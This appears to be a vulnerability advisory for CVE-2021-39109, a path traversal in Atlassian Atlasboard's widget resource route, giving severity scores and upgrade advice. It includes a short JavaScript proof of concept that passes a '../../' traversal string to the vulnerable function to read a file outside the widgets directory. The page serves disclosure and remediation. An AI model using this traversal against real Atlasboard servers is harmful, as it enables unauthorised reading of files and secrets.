CVE-2021-39109
Path traversal in atlasboard
Description
The renderWidgetResource resource in Atlassian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.

### PoC

```javascript
const fs = require("fs");
const widget = require("atlasboard/lib/webapp/routes/widget");

// Mock req and res
const req = {};
const res = {
  sendFile: (filePath) => {
    // Read and return file contents synchronously
    const data = fs.readFileSync(filePath, "utf8");
    console.log("Contents of /flag.txt:");
    console.log(data);
  },
  status: function (code) {
    this.statusCode = code;
    return this;
  },
  send: function (msg) {
    throw new Error(`Server responded with status ${this.statusCode}: ${msg}`);
  },
};

// localPackagesPath set to root to allow traversal to /flag.txt
const localPackagesPath = "/";
// resource string with path traversal to escape localPackagesPath and widgets directory
const resource = "../../flag.txt";

// Call vulnerable function (wrapped so that await is valid outside an ES module)
(async () => {
  await widget.renderWidgetResource(localPackagesPath, resource, req, res);
})();
```
How to fix CVE-2021-39109
To remediate CVE-2021-39109, upgrade the affected package to a fixed version below.
- Upgrade to 1.1.9 or later
Is CVE-2021-39109 being exploited?
Low — EPSS is 0.5%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- atlasboard: versions from 0 up to, but not including, 1.1.9
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH (7.5) | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |